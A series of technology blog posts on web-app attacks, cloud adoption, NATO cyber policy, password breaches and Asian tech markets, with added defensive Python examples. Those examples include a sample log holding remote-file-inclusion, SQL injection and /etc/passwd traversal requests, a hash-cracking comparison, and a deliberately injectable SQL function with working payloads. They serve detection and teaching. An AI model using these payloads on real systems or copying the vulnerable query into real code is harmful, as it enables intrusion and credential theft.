AWS an increasingly important tool for web app attackers

It should come as no surprise that the web application layer is one of the most vulnerable and highly targeted in any IT organisation. The latest report from Imperva, which I’ve just covered for Infosecurity Magazine, bears that out and adds some interesting new insights.

Did you know, for example, that public cloud platforms like Amazon Web Services are increasingly being used by cyber criminals to launch such attacks?

According to Imperva, 20% of all known vulnerability exploitation attempts aimed at its customers came from AWS servers – that’s a pretty sizeable chunk.

Director of security research at the Israeli firm, Itsik Mantin, told me part of the reason:

“The ability of the attackers to utilize cloud services to mount their attack makes it easier for them to carry out longer campaigns, and thus they can scan for more vulnerabilities in more pages in the target application,” he said.
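As an added illustration (not part of the original post or of Imperva’s report), here is how a defender might reproduce that “share of attacks from cloud IPs” figure against their own access log. Everything below is constructed: the log lines use documentation ranges, the three AWS prefixes are a hypothetical stand-in for the real list Amazon publishes at https://ip-ranges.amazonaws.com/ip-ranges.json, and the attack signatures are deliberately crude stand-ins for a WAF’s rules. The point is the join between “this request looks like an exploitation attempt” and “this source sits inside a cloud provider’s address space”.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: a small, hypothetical subset of AWS prefixes. The real
# list is published at https://ip-ranges.amazonaws.com/ip-ranges.json (each
# entry in "prefixes" carries "ip_prefix", "region" and "service").
SAMPLE_AWS_PREFIXES = [
    "54.240.0.0/16",
    "52.95.0.0/16",
    "3.5.140.0/22",
]

# Constructed sample access log (Apache combined format). Addresses are either
# documentation ranges or fall inside the sample prefixes above; none is real.
SAMPLE_LOG = """\
54.240.12.34 - - [10/Sep/2014:10:01:02 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Sep/2014:10:01:05 +0000] "GET /products?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 120 "-" "curl/7.30"
52.95.200.1 - - [10/Sep/2014:10:02:11 +0000] "GET /products?id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 800 "-" "sqlmap/1.0"
203.0.113.9 - - [10/Sep/2014:10:02:20 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
3.5.141.77 - - [10/Sep/2014:10:03:00 +0000] "GET /cgi-bin/test.cgi?x=../../../../etc/passwd HTTP/1.1" 404 300 "-" "python-requests/2.3"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Crude, hypothetical signatures for the attack classes the report counts:
# SQL injection, remote file inclusion and path traversal. Matching is done on
# the URL-decoded path so %27 and a literal quote are treated alike.
ATTACK_SIGNATURES = {
    "sqli": re.compile(r"'\s*(or|and)\s*'|\bunion\s+select\b", re.IGNORECASE),
    "rfi": re.compile(r"=\s*(https?|ftp)://", re.IGNORECASE),
    "traversal": re.compile(r"\.\.[/\\]"),
}


def build_network_index(prefixes):
    return [ipaddress.ip_network(p) for p in prefixes]


def is_cloud_ip(ip, networks):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def classify_request(path):
    """Return the first matching attack class for a request path, or None."""
    decoded = unquote(path)
    for name, pattern in ATTACK_SIGNATURES.items():
        if pattern.search(decoded):
            return name
    return None


def summarise(log_text, prefixes):
    """Count exploitation attempts keyed by (attack class, 'cloud'/'other')."""
    networks = build_network_index(prefixes)
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        attack = classify_request(m.group("path"))
        if attack is None:
            continue  # benign request, not part of the denominator
        origin = "cloud" if is_cloud_ip(m.group("ip"), networks) else "other"
        counts[(attack, origin)] += 1
    return counts


def cloud_share(counts):
    """Fraction of detected attempts that came from the cloud prefixes."""
    total = sum(counts.values())
    cloud = sum(n for (_, origin), n in counts.items() if origin == "cloud")
    return cloud / total if total else 0.0


if __name__ == "__main__":
    counts = summarise(SAMPLE_LOG, SAMPLE_AWS_PREFIXES)
    for (attack, origin), n in sorted(counts.items()):
        print("%-10s %-6s %d" % (attack, origin, n))
    print("share from cloud ranges: %.0f%%" % (100 * cloud_share(counts)))
```

On the constructed log three of the four detected attempts come from the sample prefixes. In practice the prefix list changes often, so load it from Amazon’s JSON on a schedule rather than pinning it, and remember that a high share from a cloud provider says something about the attacker’s infrastructure choices, not about the provider.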

Another point of note from the report is the continued growth in SQL injection attacks – up 10% since the last report – and the less well known Remote File Inclusion (RFI) attacks, which have increased 24%.

So what’s to blame? Well not necessarily bad coding, according to Mantin.

“Applications have become more complicated, with more pages and more functions, relying on more third-party modules that are hard to control, and thus the size of the attack ‘domain’ grows over time,” he explained.

Mantin also pointed out that the attack incidents analysed in the report included attacks that were detected and prevented.

“Thus the numbers in the research indicate more the attacker’s intention and less the vulnerability of the applications,” he said.


It’s finally time for governments to get all cloudy eyed.

I’ve just finished a piece for a client charting the progress of cloud computing projects in the public sector around the world and I’ve got to say, it makes pretty miserable reading for the UK.

Despite the launch, to great fanfare, of the G-Cloud project a couple of years ago, awareness among public servants seems pretty low still and sales not exactly setting the world alight – G-Cloud vendors brought in £217m in July, rising to just under £250m the month after.

That said, we’re a small country, and things are looking up. The technology is mature enough and use cases are starting to spring up all over the place, which will speed adoption. However, long-term outsourcing contracts are still impeding the development of cloud projects, according to Nigel Beighton, international VP of technology at Rackspace – a G-Cloud vendor.

“The public sector’s move to the cloud is still in its infancy, and I applaud what Liam Maxwell and the whole G-Cloud team are trying to do. But it will take time,” he told me via email.

“Over the past few years the cloud has matured and grown, and is now able to do just about everything you need it to do. For public sector agencies that are yet to make the move to the cloud, one of the main benefits is that it offers great flexibility and that they won’t be locked into one provider. There are also many parts of the sector that are hit with large peaks in their service at certain times of the year, and they could really benefit from a pay as you go, or utility, cloud-model.”

Over in China there is no such reticence, mainly because many public sector bodies have no existing legacy contracts or infrastructure to encumber them. I remember EMC’s Greater China boss saying as much a couple of years ago in Hong Kong and it’s still true, according to Frost & Sullivan’s Danni Xu.

She said the central government threw RMB 1.5bn (£150m) at public sector cloud development in the five major Chinese cities in 2011. Then local governments – many with more money than some countries – followed suit: witness Guangzhou Sky Cloud Project, Chongqing Cloud Project, Harbin Cloud Valley Project and Xian Twin Cloud Strategic Cloud Town Project. An ecosystem similar to that which has grown up in the UK, US and elsewhere, has developed around this new investment, she told me.

“The formation of a more complete cloud ecosystem has benefited local enterprises and local government in many ways. With plenty of cloud offerings available in the market, the public sector itself has also emerged as an important spender for cloud services, among the various vertical sectors,” Xu said.

“For instance, the Ningxia municipal government works with AWS on building a large-scale data center in the region. Meanwhile, it will also leverage Amazon’s platform to deliver e-government services in the future.”

Forrester analyst Charlie Dai counselled that most public sector projects in China are still private cloud based, at least when it comes to state-owned enterprises (SOEs).

“The government is also trying to strengthen the control and regulate the market,” he added.

“The China Academy of Telecommunications Research of the Ministry of Industry and Information Technology (MIIT) launched official authorisation on trusted cloud services (TRUCS) for public cloud early this year.”

Quelle Surprise.

What is obvious, in China as in the UK and elsewhere, however, is that we’re only at the beginning of a very long journey. Whether it takes 10 or 50 years, the cloud is ultimately where governments around the world will look to in order to work more productively and deliver public services more efficiently.


Is NATO about to make cyber war a reality?

This week I’ve been looking at the news that NATO’s set to ratify a new cyber policy which was first made public back in June. So far, so boring you might think.

Well, actually this one is pretty significant in that it seeks to extend Article 5 – the collective defence clause under which an attack on one NATO member is treated as an attack on all – to the cyber world.

In doing so NATO is going further than individual governments in trying to establish the international principle that a cyber attack can be treated in the same way as a traditional military strike.

However, the chances of the alliance actually invoking Article 5 are pretty slim – as KPMG cyber security partner Stephen Bonner told me, it has only been invoked once before, after 9/11.

“The reality is that few cyber attacks are likely to be of sufficient scale and impact to justify invoking Article 5 – and they would not happen in isolation from a broader deterioration in international security. In other words, if there was a state attack then it would have a broader context,” he added.

“This announcement is primarily a rhetorical point which is possibly aimed at having a deterrent effect.”

That said, I think it’s still an important step.

Some might argue that the lack of clarity around what would be considered an act of cyber war diminishes its value, but as McAfee director of cybersecurity Jarno Limnéll told me, this is the right thing to do tactically.

“I think this is wise policy: spelling out a clear threshold would encourage adversaries to calibrate their attacks to inflict just enough damage to avoid retaliation,” he argued.

Elsewhere, consultancy BAE Systems Applied Intelligence also welcomed the news.

“Cyber criminals do not respect national boundaries so protecting national interests will require increasing international cooperation,” a spokesperson told me by email.

“It is therefore encouraging to see the increasing priority which cyber is being given in NATO’s agenda. This complements multiple other initiatives nationally and internationally to address a growing security risk and help secure the systems we are increasingly reliant on.”

The new policy will not just concentrate on the collective defence clause, of course, and BAE also welcomed the increasing focus on intelligence sharing between member countries and with the private sector.

Whatever the efficacy of NATO’s move, it once again underscores the increasing importance being attached to cyber channels by politicians and military leaders.

As Limnéll said, these are necessary steps given the relative immaturity of the industry.

“We have to remember that we are just living the dawn of the cyber warfare era and the ‘cyber warfare playbook’ is pretty empty,” he told me.

“Most of the destructive cyber tools being developed haven’t been actively deployed. Capabilities to do real damage via cyber attacks are a reality but fortunately there has not been the will to use these yet. However, that is one option, as a continuation of politics, for countries nowadays.”


Hong Kong’s online TV shambles

I’ve just finished a feature slightly out of my comfort zone – Hong Kong’s online TV market, or lack thereof.

The Chinese SAR has a huge appetite for net TV – you just have to get onto an MTR, visit a dim sum restaurant or try and get past a local ambling on the pavement whilst staring at their phablet, to realise that.

The former colony also has an ideal set-up – 4G is commonplace; the locals are pretty tech-savvy early adopter types relative to the rest of Asia; and broadband penetration is amongst the highest in the world.

Yet thus far it still doesn’t have its own online TV service. Hongkongers have to get their content from mainland China or further afield to satisfy their lust for internet telly.

Local entrepreneur Ricky Wong tried his best with HKTV but hit a brick wall in the form of a government shamelessly protecting the vested interests of the region’s incumbent broadcasters.

It’s a shame because this model of broadcasting, whilst probably never fully replacing traditional modes, will definitely come to play a major part in our content consuming lives over the next decade.

Gartner’s Terick Chiu explained to me that it’s not just the online TV players and content producers who stand to benefit.

“In their efforts to drive engagement with consumers, both incumbents and new entrants are likely to invest in the technology of second-screen applications. These applications are built on top of automatic content recognition (ACR) technologies, which enable an application to detect content metadata — usually contained in a digital watermark — and synchronise the application with the on-screen programming,” he said.

“For service providers and advertisers, these second-screen apps will become an important element of the future of TV, given their ability to provide an ongoing stream of information about consumer preferences and interests. These apps also enable a form of e-commerce or ‘embedded merchandising’, which links a viewer to products/services that are featured in video programming.”

IDC’s Greg Ireland, meanwhile, argued that internet TV would “usher in a new wave of competition” in the broadcast industry – which should spell good news for viewers.

“One item to watch is how these services, or other new services, emerge as ‘true’ competitors to traditional pay TV,” he told me. “That is, will any begin to license linear content and offer a pay TV service of live and on-demand content entirely over the internet?”

It’s going to happen sooner or later in Hong Kong, as around the world, so the government might as well get out of the way and let it happen now.


Russian mega-hack: time to get serious about alternatives to passwords?

All the talk this week has been of the Russian mega-hack: a data breach, first revealed in the New York Times by a security firm called Hold Security, of an estimated 1.2 billion username and password combinations and 500 million email addresses.

So what can we say about it?

Well, according to the security experts I spoke to we can summarise as follows:

  • It won’t be enough to push website owners into adopting more secure authentication mechanisms like two-factor authentication; passwords are just too user friendly and the alternatives would be too expensive.
  • The best we can hope for is that it will encourage people to use password managers, or at least stop reusing passwords across sites, and improve the strength of those passwords.
  • It’s still not clear if this was as big a breach as claimed. We don’t know whether the details are current passwords, where they were obtained or exactly how. Fixating on the size is also missing the point a bit, as there are huge breaches every year.
  • Online firms should see this as a wake-up call. Patch those SQL injection flaws and store passwords more securely – by doing this you’ll remove the “lower hanging fruit” these Russian attackers clearly went for.

Beyond that, Thales UK head of cyber security, Peter Armstrong told me he was disheartened to see Hold Security already trying to monetise its findings by charging for breach notification services.

“One of the key building blocks that underpins the improvement in the global cyber defence posture is the preparedness of organisations to share threat intelligence. The creed and ethos here is we are only strong if we are strong together,” he added.

“Threat Information Exchange must remain a philosophy of openness and community benefit not individual benefit. This organisation [Hold Security] has derived benefit historically from this free information exchange helping them to amass the capability and intelligence to make this discovery in the first place. This kind of behaviour is likely to trigger black listing of organisations for bad behaviours from a community perspective and under those circumstances it is only the cyber criminals who benefit.”

For KPMG cyber security director, Tom Burton, the main issue here is whether passwords are still fit for purpose. He thinks not.

“The pervasive nature of the internet means mere mortals cannot possibly remember a different password for each and every website they have registered with, let alone passwords with strength,” he told me by email.

“In the short term, individuals must take a more risk based approach, maintaining strong and unique credentials for those sites that would create the greatest impact if breached (bank accounts and email accounts are two such examples) while being pragmatic and using common passwords for sites that really would be little more than an irritation if breached.”

For CISOs it comes down to risk management, and in many cases fortifying the organisation against such breaches may come higher on the agenda than dealing with advanced targeted attacks, he argued.

“It is too easy with modern processing to crack a large file of password hashes, and there will always be vulnerabilities that enable criminals to gain access to those hash files,” concluded Burton.

“If there is one thing that I feel is certain it is that this is unlikely to be the last announced breach of this kind, and is probably not going to be the largest.  If it doesn’t prompt businesses and individuals to rethink how they are protecting themselves then the criminals will have a bright future ahead of them.”
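Burton’s point about how cheap it has become to crack “a large file of password hashes” (and the experts’ advice above to keep passwords more secure) is easiest to see side by side. The example below is added here and is not from the original post, KPMG or Hold Security: the accounts and wordlist are constructed, and PBKDF2-HMAC-SHA256 from the Python standard library stands in for whatever slow KDF a site actually uses (scrypt or Argon2 are better where available). The weak scheme lets one table of hashed guesses be checked against every user at once; the salted, iterated scheme forces the attacker to pay for every (user, guess) pair separately.

```python
import hashlib
import hmac
import os
import time

# Constructed wordlist standing in for the dictionaries attackers run
# against leaked hash files.
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "letmein", "hunter2", "dragon"]


# --- Legacy scheme: one fast, unsalted hash per password -------------------
def legacy_hash(password):
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def crack_legacy(hash_file, wordlist):
    """hash_file maps user -> unsalted MD5 hex. One hash per candidate word
    serves every user at once, so the cost is len(wordlist) hashes in total."""
    table = {legacy_hash(w): w for w in wordlist}
    return {user: table[h] for user, h in hash_file.items() if h in table}


# --- Hardened scheme: per-user random salt plus a slow KDF -----------------
PBKDF2_ITERATIONS = 100_000  # tune upward as hardware gets faster


def hash_password(password, iterations=PBKDF2_ITERATIONS, salt=None):
    """Return a self-describing record: algorithm$iterations$salt$digest."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format: %s" % algo)
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
    )
    # Constant-time comparison avoids leaking how many leading bytes matched.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def crack_hardened(hash_file, wordlist):
    """hash_file maps user -> hash_password() output. Salts defeat the shared
    table, so the attacker pays one slow KDF per (user, candidate) pair."""
    found = {}
    for user, stored in hash_file.items():
        for word in wordlist:
            if verify_password(word, stored):
                found[user] = word
                break
    return found


def attacker_work(n_users, n_words, legacy):
    """Number of hash/KDF computations a dictionary attack needs."""
    return n_words if legacy else n_users * n_words


if __name__ == "__main__":
    users = {"alice": "hunter2", "bob": "Tr0ub4dor&3"}  # constructed accounts
    legacy_file = {u: legacy_hash(p) for u, p in users.items()}
    hardened_file = {u: hash_password(p) for u, p in users.items()}
    for label, fn, hf in (("md5", crack_legacy, legacy_file),
                          ("pbkdf2", crack_hardened, hardened_file)):
        t0 = time.perf_counter()
        hits = fn(hf, SAMPLE_WORDLIST)
        print("%-7s cracked=%s in %.3fs" % (label, hits, time.perf_counter() - t0))
```

Note what the hardened scheme does and does not buy you: alice’s “hunter2” is still found, because a weak password is weak under any hash. What changes is the price per guess and the loss of the shared lookup table, which is exactly the lever that decides whether a billion-row dump is worth an attacker’s electricity.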


Malaysia: another contender for Asia’s ICT crown?

IDG Connect has just published another of my forays into Asia’s ICT markets, this time focusing on Malaysia and whether it can possibly sneak in to take the crown of regional digital hub from its rivals in Hong Kong, Singapore and elsewhere.

The truth is that the country has flown under the radar for much of the past 20-odd years, although in reality the government had been pushing for foreign investment there since the early 1970s, when Intel and six other firms set up facilities in what was once nothing more than mud and rice fields.

Fast forward to today and Malaysia has something of an image problem, according to Ng Wan Peng, COO of Malaysia’s Multimedia Development Corporation (MDeC), the government agency leading the charge.

“While the country is fast-becoming viewed as a top Asian holiday destination, with beautiful beaches and luxury hotels, it doesn’t immediately spring to mind as a place for foreign firms to invest or in which to establish their Asian hub,” she told me.

The government’s efforts to change this and help the country move up the ICT value chain were spearheaded by the founding of the Multimedia Super Corridor (MSC) – a hi-tech investment zone running from Kuala Lumpur airport into the city centre. It’s designed to spur foreign investment (33% of which comes from the UK) and encourage that transformation into a “digital economy” by 2020.

The Malaysian government has put together a very generous set of inducements to invest here, including a “Bill of Guarantees” which promises MSC-status companies: a 10-year income tax “holiday” or investment tax allowance for up to 5 years; freedom of ownership; strong cybersecurity laws; and no internet censorship, according to Peng. The government also offers unrestricted employment of foreign knowledge workers, cutting visa-related red-tape.

So what else? This is what Peng had to say:

The answers range from the economical, to the cultural, to the financial. For one, we are politically and socially stable. We also believe our multi-cultural society holds a business advantage – we Malaysians are used to sitting across the table from someone of a different ethnicity to us from an early age, so we’re used to conducting business with people from all geographies and walks of life. Being a largely English-speaking population is also attractive to Western investors, while our world-class infrastructure helps to facilitate global commerce without fear of being disrupted by natural disasters.

So far so good. But there are challenges, as Frost & Sullivan APAC associate director Pranabesh Nath explained to me.

“Areas that stand out as challenges include inadequate technology infrastructure, lack of sufficient talent, small domestic market, and not enough ‘knowledge jobs’,” he argued. “Adoption of technology for consumers in terms of usage, and lower e-commerce penetration provides additional growth challenges. The government, though, recognises these shortcomings and is expected to be implementing policy to overcome them.”

Indeed, Peng explained separately, without prompting, that these areas of concern are being addressed by the government.

There’s certainly a will from the top to make this work which is heartening to see and some impressive growth stats already. Yet I wonder whether the problem Malaysia might face is in that delicate balance between encouraging foreign investment via tax breaks and other inducements and nurturing its home-grown companies.

“There are frameworks and policies since the ’90s on encouraging home grown companies, however these don’t seem to have worked very well,” Nath argued. “Technology and markets have also changed rapidly in the last 20 years and it is always hard to keep up to date with the latest development and growth areas.”

However, he was optimistic of a way to surmount this problem and accelerate Malaysia’s ICT growth without this coming at the expense of home-grown companies.

“The internet of things and its applications in industry sectors such as automobiles, healthcare and consumer are enabling new business models and use-cases such as wearable technology. These highly integrated solutions use all key tech areas such as cloud, big-data and high speed connectivity,” he explained.

“A strong emphasis on being a leader in this area, coupled with a focus on generating a knowledge intensive economy, can propel Malaysian ICT to much greater growth in the next five years. Both foreign investment and local companies’ incubation can be simultaneously pursued in these cases. Now we just need strong policies that can implement the above.”



Keeping an eye on the coders: a new idea to eliminate flawed programs

Here’s an interesting new idea from Microsoft – a radical solution to the problem of buggy code.

The new paper, co-authored by Redmond’s Andrew Begel and a group of Zurich university boffins, suggests managers monitor programmers via EEG (brain activity), EDA (skin conductance) and eye-tracking sensors. These would alert them when an individual is struggling and therefore likely to introduce flawed code.

Now, it sounds like a pretty good idea in theory, and in practice has apparently performed pretty well. But one security expert I spoke to had some major misgivings.

Imperva co-founder and CTO Amichai Shulman argued that it might stray outside the boundaries of what could be construed as “reasonable”.

“I think constantly monitoring the psychological status and the physical conditions of programmers, seems tremendously intrusive and probably strays way off from what I consider to be ‘reasonable means’,” he told me.

“However, I think that even if we review this in the cold eyes of a software professional there are some doubts about the usefulness of this method in general and its application to security vulnerabilities in particular.”

The first doubt he had relates to the tremendous commercial pressure coders are under to release “more functionality in less time”.

“On their way to achieving higher rates of LOC/sec, programmers as well as their employers are willing to sacrifice other attributes of the code such as efficiency, readability and also correctness – assuming that some of these will be corrected later during testing cycles and some will not be critical enough to be ever fixed,” he explained.

“If we introduce a system that constantly holds back on programmers because they are stressed for some reason we will effectively introduce unbearable delays into the project which will of course put more pressure on those who perform the job when schedule becomes tight.”

This is not to mention the fact that programmers should, at times, be “over” challenged to keep them sharp and happy with their roles.

“Additionally, there’s a big question of whether we can have a system like that which can make a distinction between making a critical mistake or a minor one, which again impacts its ability to have a positive effect on the software development process in general,” said Shulman.

Then, of course, there’s the issue of what kinds of flaws the system will root out.

“I think that most security related mistakes are introduced inadvertently as a consequence of the programmer not having the faintest idea regarding the potential implication of some implementation decision,” he argued. “This is the case with SQL injection, XSS, RFI and many more vulnerability types.”
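To make Shulman’s point concrete, here is an added example (not from the original post, from Imperva or from the Microsoft paper) of the kind of “implementation decision” he means. The accounts and placeholder hashes are constructed and the database is an in-memory SQLite file. The vulnerable lookup works perfectly for every username a developer would ever type in testing; nothing about it looks like a mistake until someone supplies a quote character, which is precisely why no amount of stress monitoring would flag it.

```python
import sqlite3

# Constructed accounts; the "hashes" are placeholder strings, not real digests.
SAMPLE_USERS = [
    ("alice", "hash-alice", "user"),
    ("bob", "hash-bob", "admin"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        SAMPLE_USERS,
    )
    conn.commit()
    return conn


def lookup_user_vulnerable(conn, username):
    # Looks innocuous, and works for every normal username the developer ever
    # tested with. Quote characters in the input are what turn data into SQL.
    query = "SELECT username, role FROM users WHERE username = '%s'" % username
    return conn.execute(query).fetchall()


def lookup_user_safe(conn, username):
    # Same query; the driver binds the value, so it can never be parsed as SQL.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Two classic payloads: the first turns the WHERE clause into a tautology, the
# second appends a UNION that pulls a column the query never exposed.
PAYLOAD_TAUTOLOGY = "' OR '1'='1"
PAYLOAD_UNION = "x' UNION SELECT username, password_hash FROM users --"


if __name__ == "__main__":
    conn = make_db()
    for name, payload in (("tautology", PAYLOAD_TAUTOLOGY), ("union", PAYLOAD_UNION)):
        print(name, "vulnerable:", lookup_user_vulnerable(conn, payload))
        print(name, "safe:      ", lookup_user_safe(conn, payload))
```

Run it and the vulnerable lookup returns every account for the first payload and every password hash for the second, while the parameterised version returns nothing for either, because it is looking for a user literally named `' OR '1'='1`. The fix is not cleverer escaping but never building the statement from the input at all.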

So, bottom line: nice idea Microsoft, but it’s probably not going to solve the problem of poor coding anytime soon. Until something genuinely revolutionary comes along we’ll probably have to stick to the usual suspects to reduce risk: security tools, patching, better QA and testing.


No-IP? No idea. Why Microsoft faces an uphill battle to restore trust

To say this week was a bad news week for Microsoft would be putting it mildly.

First, its heavy-handed decision to stop emailing security updates to users (in response to new Canadian anti-spam laws) was u-turned in a rather embarrassing manner.

Then came something much worse, as Redmond’s Digital Crimes Unit (DCU) unilaterally sought a court injunction to seize control of 22 domains belonging to dynamic DNS firm No-IP.

It did this to arrest the spread of malicious activity on some of the domains, but commentators are already, with good reason, calling its strategy misjudged this time around:

  • No-IP was not informed of the take-down, nor was it working in collusion with the cyber criminals. It also pleaded that it has always co-operated with the authorities when asked on such matters previously.
  • Microsoft was unable to filter good traffic from bad, leading to millions of legitimate No-IP customers left without a service earlier this week.

Europol special advisor on internet security, Brian Honan, told me that the incident will further undermine the credibility of tech giants like Microsoft, which has already taken a pasting thanks to the NSA spying revelations from whistleblower Edward Snowden.

He raised a number of valid concerns with me by email:

• If No-IP were not contacted by Microsoft DCU regarding the abuse of their services what right have Microsoft DCU got to determine how good or bad the No-IP abuse mechanisms were? Indeed, what are the criteria and standards that Microsoft used to determine how responsive the No-IP abuse desk is? Are all service providers, including Microsoft, now expected to meet the requirements and expectations of Microsoft DCU? And if not can they expect similar interruptions to their business?
• Microsoft DCU also showed they do not have the technical capabilities in managing Dynamic DNS services and subsequently have impacted many innocent users and businesses, how will Microsoft DCU ensure
• There are also concerns over Microsoft infringing on the privacy of No-IP’s legitimate customers. In effect Microsoft diverted all of these customers’ internet traffic via Microsoft’s systems. An action that could place No-IP and Microsoft in breach of their own privacy policies and indeed various privacy laws and regulations.

This is probably the first major mis-step by the Digital Crimes Unit, and it will need to re-examine its procedures and processes very carefully to avoid a repeat. Its loss of face in this incident will only benefit the cybercriminals if it makes Redmond and others more hesitant to take action in future cases.


News of the World hackers, hacked ATMs and celeb snooping

News of the World private investigator Glenn Mulcaire was this week revealed to have gone to extraordinary lengths to hide his illegal tapping of celebrities’ voicemails: hacking an ATM to use its phone line.

I covered the story here for Infosecurity Magazine but thought it was worth including some extra comments.

Mulcaire’s cover was finally blown when BT sent a bill for the landline to the ATM owner, who forwarded it to the convenience store in which it was located, in a scruffy part of south London.

Sophos senior security advisor Paul Ducklin explained to me that Mulcaire probably chose an ATM line rather than tapping a copper phone line by other means for several reasons.

“1. Unlike a fax machine the line never plays through a speaker for feedback purposes. Fax machines usually play their modem noises for a few seconds as part of the ‘user interface’.

2. If you interrupt a data transmission, the system will probably sort itself out automatically later on and no-one will realise that it was deliberate, rather than just a glitch. And you’ll hear the modem trying to come on-line, so you can hang up temporarily to get out of the way.

3. It’s likely to be a rented service that bundles in the phone line, so the bills probably go through a convoluted route to the person where the line is actually installed, making detection more complex – as happened here.”

He stressed the importance of business owners checking their phone statements, just as one should check bank statements or those belonging to online accounts, for any signs of suspicious activity.

“Cybercriminality usually leaves traces, and the one thing you can be sure of if you don’t make a habit of looking for those traces is that you won’t find them,” Ducklin told me.

“In various recent high-profile credit card breach cases, the afflicted retailer found out because someone outside the organisation noticed suspicious patterns of fraud. Best not to wait until someone else finds out before you do.”


Is Taiwan’s last chance at tech survival the connected home?

I’ve just finished another piece for IDG Connect taking apart the Taiwanese technology industry – it seemed like as good a time as any on the back of Computex 2014.

If you haven’t heard of the show, it’s the second largest IT event in the world and has been held every year in Taipei for 34 years.

Well, the island formerly known as Formosa has been punching well above its weight on the tech scene for decades now, thanks to lots of government investment, a booming chip industry and a steady stream of bright young engineers and designers pouring from its universities.

But as I found out, many of its major firms are facing an unprecedented set of challenges which could threaten its long term future.

Firstly, the PC market is in decline – bad news for Acer and Asus, the 4th and 5th placed global brands. Whether it is terminal decline we still don’t know, but it has certainly meant Taiwan’s major ODM/OEM firms have had to adapt to a new mobile-centric output.

The two big brands mentioned above, however, haven’t done a very convincing job so far.

“The whole shift to mobility including smartphones and tablets is the new growth curve for the whole industry,” Forrester analyst Bryan Wang told me from Computex. “What I have seen is that Taiwanese companies are losing in this space.”

Gartner’s Amy Teng was not much more optimistic.

“These manufacturers have to rely on brand vendors to consume their production outcome. This business relationship is weak because today’s PC supply chain is advanced and standardised enough to transplant from vendor to vendor easily,” she argued.

Teng added that the move from high volume, low customisation products to low volume, highly customised products is a big challenge – especially when these manufacturers are being asked to be more cost effective and quicker to market.

All is not lost, though. The country’s semiconductor firms are still well placed and there are opportunities in other areas for those ODM/OEM giants like Wistron, Foxconn, Quanta and Pegatron.

“Regarding how to overcome, or thrive in the coming decade, I do not see any opportunity in the smartphone/tablet space now. However, Taiwanese companies still stand a chance in the connected home space, which is set to evolve in the next couple of years,” said Wang.

“Home/smart gateways, set-top-boxes and smart routers – these could be the angles. At Computex here, I do see home grid, smart plugs, smart home solutions are evolving as an interesting area.”